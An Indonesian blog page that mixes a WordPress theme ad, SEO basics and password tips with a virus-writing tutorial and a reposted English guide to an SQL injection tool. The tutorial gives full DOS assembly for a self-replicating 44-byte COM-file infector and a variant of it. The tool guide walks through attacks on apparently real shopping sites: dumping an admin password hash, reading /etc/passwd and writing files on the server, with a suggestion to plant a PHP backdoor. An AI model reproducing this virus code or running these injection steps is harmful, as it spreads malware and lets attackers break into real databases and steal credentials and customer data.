Welcome To http://tipsdesain.blogspot.com/ | Semoga Anda Mendapatkan Hal Yang Anda Cari Disini
Sering - Sering Mampir Ya ... | Jangan Lupa Li like | Shar On Facebokk | Dan Tinggalkan Coment

BOGRES ( BONEK GRESIK )And Me....

rugi bila kita tak jalin kebersamaan hampa bila kita tak pupuk tali kasih sayang.

BOGRES ( BONEK GRESIK )And Me....

dalam kebersamaan kita bersatu penuh kasih Dalam satu tali persaudaraan di asah oleh kesabaran dibalut keikhlasan.

BOGRES ( BONEK GRESIK )And Me....

dalam kebersamaan ini bersama kita dalam duka Tertawa dalam canda merajut asa bersama dibungkus kecintaan yg sama.

BOGRES ( BONEK GRESIK )And Me....

dengannyalah kita saling berbagi menumpahkan segala asa dalam dada mencari jati diri dipandu teman sejati Yang slalu setia menemani memberi arah di waktu mendua menopang dikala terjatuh.

BOGRES ( BONEK GRESIK )And Me....

kita jalin kebersamaan ini tanpa batas ruang dan waktu ya Allah kokohkanlah kasih sayang pada kami lenyapkanlah benih ego dan angkara satukanlah kami dalam naungan cinta dan ridho-Mu.

Sabtu, 29 Januari 2011

template wordoress Enstyle




Enstyle adalah sebuah tema Wordpress gratis dengan opsi menampilkan konten dan mendukung thumbnail posting. Cocok untuk setiap ceruk. Tema Pilihan pada panel admin.

Fitur:

* Pilihan Halaman
* Post Thumbnail
* Featured Content
* 125 × 125 spanduk siap (mudah diedit dari pilihan admin)
* 468 × 60 Header Banner siap (mudah diedit dari pilihan admin)
* Tiga kolom
* Gravatar di Komentar
* Kompatibel dengan versi Wordpress terbaru
* Widgets Siap
* SEO Optimized
* Fixed lebar
* dengan file PSD. dan file font yang disertakan dalam folder tema.
* Diuji dan kompatibel dengan semua browser utama: IE, FF, Safari

Admin Pilihan Fitur:

* Featured Content
* gambar logo
* Twitter
* Header 468 × 60 piksel banner code
* 125 × 125 piksel banner
* Sidebar Iklan / Banner
* Header dan kode script Footer

klik di bawah ini untuk :

=> live demo
=> download

Pengertian SEO

SEO ?
Apakah pengertian SEO ?

SEO singkatan dari Search Engine Optimation. Berdasarkan singkatan pada SEO yaitu search engine atau mesin pencari dan optimation atau optimisasi. Jadi pengertian SEO itu adalah serangkaian proses yang dilakukan secara sistematis yang memiliki tujuan meningkatkan kualitas traffic kunjungan melalui mesin pencari menuju suatu website atau sebuah blog dengan memanfaatkan algoritma dari suatu search engine (mesin pencari).

SEO itu sendiri bertujuan untuk memposisikan suatu website atau sebuah blog agar berada di posisi teratas atau halaman pertama pada suatu mesin pencari dari hasil pencarian berdasarkan keyword atau kata kunci yang telah kita targetkan. Bila artikel suatu website atau sebuah blog banyak atau sering berada di posisi teratas maka secara otomatis akan memiliki jumlah pengunjung yang banyak pula pada web/blog tersebut.

Tokoh-tokoh SEO :

1. Danny Sullivan
2. Matt Cutts
3. Vannesa Fox

Jumat, 28 Januari 2011

Blog Claim

JDCM59XDXPZ3

Pemrograman Virus Komputer

Cara kerja Virus Komputer pada umumnya adalah menyebarkan dirinya dengan cara antara lain menularkan file-file executable atau file-file yang bisa dijalankan langsung dari DOS Command line . Untuk memperjelas mekanisme penyebaran di ilustrasikan pada gambar dibawah ini :




Gambar 4.1. Mekanisme Penularan



Sudah jadi sifat virus jika dia dijalankan, maka ia menulari program aplikasi yang lain, yang di maksud menulari adalah menyalin dirinya atau program virus tersebut ke program aplikasi lainnya, jika dalm hal ini yang tertular adalah program Aplikasi 1, maka apabila program aplikasi 1 tersebut dijalankan, maka program aplikasi 1 yang sudah serinfeksi virus itu akan menularkan virus pada program aplikasi yang ke 2 , maka baik program aplikasi 1 maupun 2, sudah merupakan program pemikul bagi virus itu sendiri, yang akan menularkan seluruh program aplikasi yang ada.


Agar bisa bertindak sebagai virus komputer, sebuah program harus mempunyai 5 buah kemampuan yang merupakan prinsip dari virus komputer. Kelima kemampuan itu adalah :




  1. Kemampuan mendapatkan informasi




  2. Kemampuan memeriksa program




  3. Kemampuan menggandakan diri / menularkan




  4. Kemampuan mengadakan manipulasi




  5. Kemampuan menyembunyikan diri sendiri




Satu persatu kemampuan itu akan dijelaskan pada subbab selanjutnya



4. 1.1. Kemampuan mendapatkan Informasi



Pada Virus Komputer kemampuan untuk mendapatkan informasi sangat penting, terutama informasi mengenai file yang akan diinfeksi, Virus Komputer biasa nya tidak menulari 1 program saja, tapi sekumpulan program, contohnya File-file EXE, file-file COM, atau kedua-duanya, virus harus mendapatkan informasi tentang file tersebut pada directory, hal-hal mengenai informasi pada file yang perlu diketahui antara lain :


1. Apakah Extensi File tersebut ( COM,EXE, BAT)

2. Apa Atribut file ( Hidden, Readonly, Archive)

3. Besar File Yang akan Di infeksi


Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Extension file berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus tersebut harus mencari file-file EXE yang akan ditulari.


Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat menyerang file dengan attribut Readonly, Hidden ataukan virus harus mengeset attribut file-file tersebut menjadi Normal, sehingga virus dapat menulari.


Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana



Besar_file_terinfeksi = file_asli + Virus_size



Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan informasi tentang File :




Start : mov dx,offset File_to_infect ; cari seluruh file Mov ah,4Eh

Mov cx, 3 ; Attribut File ; cari host file


———


int 21h ; Dos Intrupt

cmp ax,12h ; Ada file lagi


je exit ; kalau tidak ada exit


———


file_to_infect db “*.COM” ; File yang akan diinfeksi

ends start ; akhir kode Virus





Listing 4.1. Search First File



Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk mencari file pertama yang cocok dengan DX ( Find First Matching File), dan mendapat kan informasi tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya yang cocok ( Find Next Maching File), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.



4. 1. 2. Kemampuan Untuk Memeriksa Program



Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer , karena untuk mengetahui apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan menularkan dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses penularan juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang pada file yang sama, CRC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan, biasaanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File, selain itu file yang berkali-kali diifeksi akan bertambah besar, dan akan mencurigakan pemakai komputer. Seperti digambarkan dalam flowchart berikut ini :




Gambar 4.2. Memeriksa Program




Berikut ini contoh listing dari kemampuan untuk memeriksa file




Mov ah, 3fh ; Baca file

Mov cx, 3 ; baca 3 byte

Mov dx,3_byte ; simpan pada buffer

Add dx,si ; Nama file

Int 21h ; Dos intrupt

Cmp a,3 ; Cek 3 byte tadi

Jnz cari_lagi ; Jika sudah tertular exit

Jmp Infect ; kalau belum , infect_file

3_byte equ $ ;data 3 byte pertama dari file asli

;yang belum tertular

infect_file : ; bagian penginfeksian



———— ; rutin infeksi



int 20h ; Dos Exit function

nop ; No Operation





Listing 4.2 . Periksa File



Pada rutin diatas dapat dilihat bagai mana Virus Komputer memeriksa file korbannya, untuk memberikan identitas file mana yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban, umumnya 3 byte pertama yang menandakan file tersebut sudah tertular / belum, 3 byte pertama tersebut umumnya intruksi JMP : offset (Untuk file COM) , kode ‘MZ’ pada header file EXE dan PE untuk File Aplikasi Windows


Rutin ini sangat penting untuk menghindari penularan berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin ini dipakai oleh 90 % virus komputer untuk menularkan diri.


4. 1. 3. Kemampuan untuk menggandakan diri / Replicating


kemampuan ini merupakan inti utama dari Virus Komputer , karena virus komputer memang diprogram untuk menularkan, dan memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena rutin tersebut harus mampu menyebarkan virus dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin replicator harus dapat menjaga agar file yang ditularinnya tidak rusak ( Rutin untuk Virus Appending / NonOverwriting ), dan dapat berjalan sebagaimana mestinnya.


Cara kerja rutin replicator pada file COM lebih sederhana dari file EXE, karena struktur program EXE yang tidak terbatas besarnya yaitu ( sebesar memory di komputer ), sedangkan file COM hanya dibatasi sampai 64 Kb ( Base memory ). Rutin replikator pada file COM akan menditeksi dan mengcopy byte pertama dari file yang akan ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan kedalam daerah lain dalam file.



File bersih program Virus


Pada diagram diatas P1 adalah bagian pertama dari file, P2 adalah bagian kedua dari file korban. P1 harus sama besar dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada bagian akhir dari file.



Setelah itu virus akan mengcopykan bagian pertama dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi JMP:V2, yaitu instruksi untuk memanggil badan Virus yang ada di belakang file korban.


Kemudian virus akan mengcopykan bagian kedunya (V2) yang merupakan badan virus ke akhir file yang ditulari, V2 ini biasanya berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat dibawah ini :



Dalam program dapat diambil contoh 44-Virus.Com , yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus itu sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah ini virus hanya mempunyai kemampuan untuk menulari file Com.


Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com.


Berikut ini listing dari 44-Virus.Asm :




virus segment

org 100h ; file COM

assume cs:virus


len equ offset last-100h ;Panjang virus = Akhir program – awal program

start : mov ah,04eh ; Cari file dengan kategori file COM

xor cx,cx ; cx 0, = hanya file dengan atrribut Normal

lea dx,com_mask ; Nama file COM masukan ke register DX

int 21h ; Dos Intrupt

open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis

mov dx,9eh

Int 21h

Infect : mov cx,len ; cx diisi panjang badan virus

lea dx,start ; Masukan header Virus “V1″ pada DX

Mov ah,40h ; Tulis badan virus dalam file korban

Int 21h ; Dos Intrupt

Next : mov ah,3eh ; Tutup file korban

int 21h

mov ah,4fh ; Cari file korban lagi

int 21h

jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file

; Kalau sudah semua terinfeksi Exit


com_mask: db “*.COM”,0 ; File dengan ekstensi Com

last : db 090h ; Akhir badan virus “V2″

virus ends


end start




Listing 4.3. Replicating / Penggandaan




4. 1. 4. Kemampuan Mengadakan Manipulasi


Kemampuan untuk mengadakan manipulasi sangat penting dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah :




  1. Menampilkan tulisan / kata-kata / gambar




  2. Membunyikan port speaker




  3. Time bomb / logic Bomb





4.1.4.1. Menampilkan Tulisan / gambar



Rutin ini yang paling banyak dipakai oleh pembuat Virus Komputer , karena rutin ini selain untuk kepopularitas virus maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan menarik. Listing program dibawah ini akan memberikan contoh pembuatan rutin ini.






virus segment

org 100h

assume cs:virus


len equ offset last-100h ; Panjang virus = Akhir program – awal program

start : jmp mulai



msg db ‘ Modification of 44 Virus ‘,13,10

db ‘ © 2000,iwing[indovirus] ’,13,10

db ‘ – For Educational Only -$’,13,10



mulai : mov ah,09 ; Dos service 09h = Cetak String

lea dx,msg ; dx berisi pesan yang akan dicetak

int 21h ; Dos intrupt

go : mov ah,04eh ; Cari file dengan kategori file COM

xor cx,cx ; cx 0, = hanya file dengan atrribut Normal

lea dx,com_mask ; Nama file COM masukan ke register DX

int 21h ; Dos Intrupt

open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis

mov dx,9eh

Int 21h

infect : mov cx,len ; cx diisi panjang badan virus

lea dx,start ; Masukan header Virus “V1″ pada DX

mov ah,40h ; Tulis badan virus dalam file korban

Int 21h ; Dos Intrupt

Next : mov ah,3eh ; Tutup file korban

int 21h

mov ah,4fh ; Cari file korban lagi

int 21h

jnb open_file ; Apa sudah semua file Com ?,kalau belum jmp ke Open_file

; Kalau sudah semua terinfeksi Exit


com_mask: db “*.COM”,0 ; File dengan ekstensi Com

last : int 20h ; Akhir badan virus “V2″


virus ends


end start





Listing. 4.4. Rutin Cetak String


Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte

Dengan tambahan rutin untuk menampilkan string :



Modification of 44 Virus

© 2000,iwing[indovirus]

-For Educational Only –



setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu



mulai : mov ah,09 ; Dos service 09h = Cetak String

lea dx,msg ; dx berisi pesan yang akan dicetak

int 21h ; Dos intrupt


Simple SQL Dumper V.5.1

[o] attention


USE THIS TOOL FOR EDUCATION PURPOSE ONLY.

WE ARE NOT RESPONSIBLE OF ANY DAMAGE AND IMPROPERLY USE OF THIS TOOL.

USE IT AT YOUR OWN RISK!!


[o] what is SSDp?


SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.


[o] download SSDp v5.1


http://okedeh.co.tv/ssdp51.tar.gz


http://pacenoge.org/tool/ssdp51.tar.gz


[o] function


- SQL Injection

- Operation System Function

- Dump Database

- Extract Database Schema

- Search Columns Name

- Read File (read only)

- Create File (read only)

- Brute Table & Column


[o] command and option


[root@evilc0de noge]# perl ssdp.pl -h


|—————————————————————————–|

| Usage: perl ssdp.pl [options] |

| |

| -u [SQLi URL] target with id parameter or sqli url with c0li string |

| -e [sqli end tag] sql injection end tag (default: “–”) |

| -d [database name] this option should not be used (default: @@database) |

| -t [table name] table_name |

| -c [columns name] column_name (example: id,user,pass,email) |

| -s [space code] SPACE code: +,/**/,%20 (default: “+”) |

| -f [max field] max field to get magic number (default: 123) |

| -start [num] row number to begin dumping data |

| -stop [num] row number to stop dumping |

| -where [query] your special dumping query |

| |

| -info Get MySQL Information [MySQL v4+] |

| -dbase Concat Databases [MySQL v5+] |

| -table Concat Tables [MySQL v5+] |

| -column Concat Columns [MySQL v5+] |

| -tabcol Concat Tables with Columns [MySQL v5+] |

| -find Search Columns Name [MySQL v5+] |

| -magic Find Magic Number [MySQL v4+] |

| -dump Dump Data [MySQL v4+] |

| -brute Fuzzing Tables & Columns [MySQL v4+] |

| |

| -log [file name] file name to save ssdp data (default: ssdp.log) |

| -p [http proxy] hostname:port |

|—————————————————————————–|


[o] proof of concept


[0x01] magic number (null column).


first of all we have to find null column (magic number).

null column used for execute our SQL query.


# perl ssdp.pl -u [target URL] -magic


[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2 -magic


[o]=================================================[x]

| Simple SQLi Dumper v5.1 |

| Coded by Vrs-hCk |

[o]=================================================[o]

Help Command: -h, -help, –help


[+] URL: http://www.460productions.com/store.php?cat=2

[+] End Tag: –


Attempting to find the magic number…


[+] Testing: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,


[+] Field Length : 24

[+] Magic Number : 1

[+] URL Injection: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24


Showing MySQL Information …


[+] Database: 460store

[+] User: i460usr@boscgi1002.eigbox.net

[+] Version: 5.0.51a-log

[+] System: redhat-linux-gnu

[+] Access to “mysql” Database: No

[+] Read File “/etc/passwd”: Yes (w00t)

[+] Create File “/tmp/c0li-430.txt”: Yes (w00t)


Done.


our magic number is 1 and it will replace with “c0li” string.

we can see the database information and operation system too.


[0x02] finding table


now we use URL that include “c0li” string on it to find table & column.


# perl ssdp.pl -u [c0li URL] -table


[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -table


[o]=================================================[x]

| Simple SQLi Dumper v5.1 |

| Coded by Vrs-hCk |

[o]=================================================[o]

Help Command: -h, -help, –help


[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

[+] SQLi End Tag: –

[+] Database Name: database()

[+] Number of Tables: 18


Showing tables …


[1] aspect_ratio(2)

[2] audio_format(3)

[3] category(7)

[4] customer(200)

[5] deposit(11)

[6] discount_group(9)

[7] discount_group_price(10)

[8] order()

[9] order_item(261)

[10] order_source(5)

[11] order_status(4)

[12] order_type(2)

[13] payment_type(4)

[14] product(30)

[15] product_group(17)

[16] security(1)

[17] shopping_cart(0)

[18] user_session(68)


Done.


that is the list of all table in database()


[0x03] finding column


let’s see column from table called “security”.


# perl ssdp.pl -u [c0li URL] -t [table] -column


[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -column


[o]=================================================[x]

| Simple SQLi Dumper v5.1 |

| Coded by Vrs-hCk |

[o]=================================================[o]

Help Command: -h, -help, –help


[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

[+] SQLi End Tag: –

[+] Database Name: database()

[+] Table Name: security

[+] Number of Columns: 5


Showing columns from table “security” …


[+] security(1): user_id,username,password,admin,last_login


Done.


aha! we got column called “username” and “password”.


[0x04] dumping data


now we’ll see information inside that column.. :)


# perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump


[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -c username,password -dump


[o]=================================================[x]

| Simple SQLi Dumper v5.1 |

| Coded by Vrs-hCk |

[o]=================================================[o]

Help Command: -h, -help, –help


[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

[+] SQLi End Tag: –


[+] Database Name: database()

[+] Table Name: security

[+] Column Name: username,password

[+] Data Count: 1


Dumping Data …


[1] admin : 2ec20101734c754d


Done.


we got admin username and password hash. :D

ok i have show you how to find magic number, table, column and dump data the column using SSDp.


[0x05] search column name (-find)


now i’ll show you how to use -find option (Search Columns Name)

i’ll try to search column with keyword “address” it require -c option (column)


# perl ssdp.pl -u [c0li URL] -d [database name] -c [keyword] -find


[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -c address -find


[o]=================================================[x]

| Simple SQLi Dumper v5.1 |

| Coded by Vrs-hCk |

[o]=================================================[o]

Help Command: -h, -help, –help


[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

[+] SQLi End Tag: –

[+] Database Name: 460store

[+] Column Name string to search: address


Searching for Columns Path …


[+] Columns Found:


[1] 460store.customer.email_address

[2] 460store.customer.address_line1

[3] 460store.customer.address_line2

[4] 460store.customer.address_city

[5] 460store.customer.address_state

[6] 460store.customer.address_zip

[7] 460store.customer.address_country

[8] 460store.customer.address_name


Done.


found column with word “address” on table “customer”. easy right? :p


[0x06] read & create file (read only)


now let’s see Read File (read only) & Create File (read only).

why read only? coz this function design just to test if we can read file or no. to inject, we do it manually.. :(

as you can see at the first time we find magic number you’ll find this line.


[+] Read File “/etc/passwd” : Yes (w00t)

[+] Create File “/tmp/c0li-159.txt” : Yes (w00t)


it means we can read (load_file) the /etc/passwd file on a target also we can create file at /tmp directory.

to use load_file you need to convert the /etc/passwd into hexadecimal. http://pacenoge.org/encdec


http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24–


the result will be like this.


root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh


let’s create some file in /tmp directory. :)


http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,”Simple SQLi Dumper”,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+into+outfile+”/tmp/ssdp.txt”–


URL above means we write “Simple SQLi Dumper” into ssdp.txt that locate at /tmp directory.

to see if it works or no lets read /tmp/ssdp.txt using load_file function. don’t forget to convert it first.


http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f746d702f737364702e747874),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24–


and you will see result like this.


1 2 3 4 5 6 Simple SQLi Dumper 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24


that the word we write in /tmp/ssdp.txt.

what can we do with create file vuln? we can make a php file as backdoor at the target if we know the directory path. :) )


[0x07] brute MySQL v4


guessing table & column for MySQL v4.

you can add your own table name & column name by editing file called tables.dict & columns.dict.


# perl ssdp.pl -u [c0li URL] -brute


[root@evilc0de noge]# perl ssdp.pl -u http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33 -brute


[o]=================================================[x]

| Simple SQLi Dumper v5.1 |

| Coded by Vrs-hCk |

[o]=================================================[o]

Date : Sun Mar 21 19:31:42 2010

Help Command: -h, -help, –help


[+] c0li SQLi URL: http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33

[+] SQLi End Tag: –

Finding Tables & Columns …


[1] admin_user: username,password,email,adminid,adminname,phone,


Done.


found table “admin_user”

found column “username” “password” “email” “adminid” “adminname” “phone”


[0x08] conclusion


by using SSDp, it’s very easy to find SQL injection vulnerability at certain vulnerable parameter or string.

this tool also perform SQL injection test to the vulnerable website and try to dump data from MySQL database.

you can dump data from MySQL database columns and it works nicely.

you can gather secret and confidential data such as usernames, passwords, credit card numbers and etc.

but, i suggest using this tool in a right way. okey dude?? :p


[0x09] references


perl ssdp.pl -h


http://en.wikipedia.org/wiki/SQL_injection


http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/


[0x10] greetz ^^


SSDp coded by Vrs-hCk ( ander[at]antisecurity[dot]org )

SSDp How To by NoGe ( mario[at]antisecurity[dot]org )


Vrs-hCk OoN_Boy paman zxvf angel stardustmemory

s4va xr00tb0y S3T4N pizzyroot matthews martfella

Tips: Cara Menjaga Password

Password merupakan kode-kode rahasia yang harus dijaga keamanannya. Banyak hal negatif yang dapat terjadi ketika password Anda bocor ke tangan orang lain. Simak 7 kiat singkat untuk menjaganya.

1. Tidak Menggunakan Default Password
Default password adalah password yang kita dapat pertama kali. Password standar ini sebaiknya memang harus cepat diganti lantaran sangat rentan. Pasalnya, default password dapat dicari dengan mudah di google search, bahkan di situ tercantum nama mesin, type dan default password terpampang dengan megah di beberapa situs vendor pembuatnya.

Terkadang administrator takut lupa dengan mengubah-ubah default password yang ada, sehingga seorang penyusup dapat mengambil alih sistem dengan default password.

2.Tidak Memakai Password Hint
Terkadang kita takut lupa dengan password yang sudah kita entry ke dalam sistem/account, sehingga kita perlu membuat sebuah pengingat bila kita lupa dengan password tersebut. Nah pengingat ini disebut password Hint, bila kita membuat pertanyaan dengan password hint ini maka dengan cepat kita dapat mengingat kembali password yang lupa tersebut.

Begitu juga dengan para hacker, mereka akan mencoba-coba dengan menebak password kita dengan berbagai pertanyaan di password hint, lama kelamaan password tersebut akan tertebak, bila pertanyaan yang tertera di password hint dapat dijawab oleh si penebak password.

3.Tidak Menuliskan Password
Pemilik password sering kali takut lupa dengan password yang telah dimasukkan, sehingga pemilik password akan menuliskan berbagai user id dan passwordnya ke dalam media lain seperti notebook, notepad, stickies (mac), password folder, buku, handphone dan lainnya.

Hal ini juga cukup rentan bocor. Mengapa rentan? Karena bila berbagai peralatan tersebut hilang, maka semua informasi tentang user id dan password tersebut cepat atau lambat akan diketahui oleh si pencuri peralatan/gadget yang hilang.

4.Menggunakan Password yang Kuat

Pemilik password seringkali menggunakan password yang pendek saja, kalau saja bisa lebih pendek dari 3 character maka user tersebut akan memberikan password yang pendek. Untung saja saat ini sistem memberikan panjang password minimal 6 karakter dan maksimal 254 karakter. Semakin panjang sebuah password maka akan semakin kuat keamanan password tersebut.

Password yang kuat dapat dibuat dengan kombinasi angka dan huruf bahkan berbagai karakter yang lain. Beberapa admin saat ini menggunakan password yang cukup panjang, ditambah dengan enkripsi seperti PGP key dan lainnya, sehingga cukup sulit untuk dapat menebak password tersebut.

5.Sering Mengubah Password
Pemilik password sebaiknya secara berkala mengubah password untuk autentikasi tersebut, semakin sering password berubah semakin baik, karena semakin sulit si penebak password menjebol account/system kita. Perubahan terhadap password tergantung si pemilik, bisa seminggu, sebulan, tiga bulan sekali dan lainnya. Asal si pemilik tidak lupa dengan password yang sudah diubah tadi.

6.Tidak Memakai Password Sama pada Beberapa Account

Pemilik password kadang sering lupa dan sering membuat account yang cukup banyak, sehingga mereka setiap membuat account baru menggunakan user id yang sama dan password yang sama, ini sangat rentan dan bahaya. Karena satu account tembus password ini, maka semua account akan dapat diambil oleh hacker tersebut.

7. Menggunakan Manajemen Password
Untuk membantu mengingatkan kembali berbagai password dan berbagai account, seringkali kita sangat kesulitan, tapi tidak perlu khawatir karena sudah banyak saat ini aplikasi untuk membantu menata password kita. Aplikasi ini dapat didownload secara gratis dari internet maupun berbayar, sehingga berapapun account kita dan berapapun password kita dapat dengan mudah untuk diingat dan dibuka kembali, tentu saja untuk membukanya dengan metode enkripsi juga.


*) Penulis adalah IGN Mantra, Analis Senior Keamanan Jaringan dan Pemantau Trafik Internet ID-SIRTII sekaligus Dosen Keamanan Jaringan dan Cybercrime. www[dot]detik[dot]com

Cara Menghapus Virus Shortcut

CARA 1 MENGHAPUS VIRUS SHORTCUT:


Berikut 8 langkah praktis untuk mendepak virus yang mampu mengubah folder yang ada di dalam USB flash disk menjadi shortcut tersebut:


1. Nonaktifkan ‘System Restore’ untuk sementara selama proses pembersihan.


2. Putuskan komputer yang akan dibersihkan dari jaringan.


3. Matikan proses virus yang aktif di memori dengan menggunakan tools ‘Ice Sword’. Setelah tools tersebut terinstal, pilih file yang mempunyai icon ‘Microsoft Visual Basic Project’ kemudian klik ‘Terminate Process’. Silahkan download tools tersebut di http://icesword.en.softonic.com/


4. Hapus registri yang sudah dibuat oleh virus dengan cara:

-. Klik menu [Start]

-. Klik [Run]

-. Ketik REGEDIT.exe, kemudian klik tombol [OK]

-. Pada aplikasi Registry Editor, telusuri key [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

-. Kemudian hapus key yang mempunyai data [C:\Document and Settings\%user%].


5. Disable autoplay/autorun Windows. Copy script di bawah ini pada program notepad kemudian simpan dengan nama REPAIR.INF, install file tersebut dengan cara: Klik kanan REPAIR.INF –> INSTALL


[Version]


Signature=”$Chicago$”


Provider=Vaksincom


[DefaultInstall]


AddReg=UnhookRegKey


DelReg=del


[UnhookRegKey]


HKLM, Software\CLASSES\batfile\shell\open\command,,,”"”%1″” %*”


HKLM, Software\CLASSES\comfile\shell\open\command,,,”"”%1″” %*”


HKLM, Software\CLASSES\exefile\shell\open\command,,,”"”%1″” %*”


HKLM, Software\CLASSES\piffile\shell\open\command,,,”"”%1″” %*”


HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”


HKLM, Software\CLASSES\scrfile\shell\open\command,,,”"”%1″” %*”


HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255


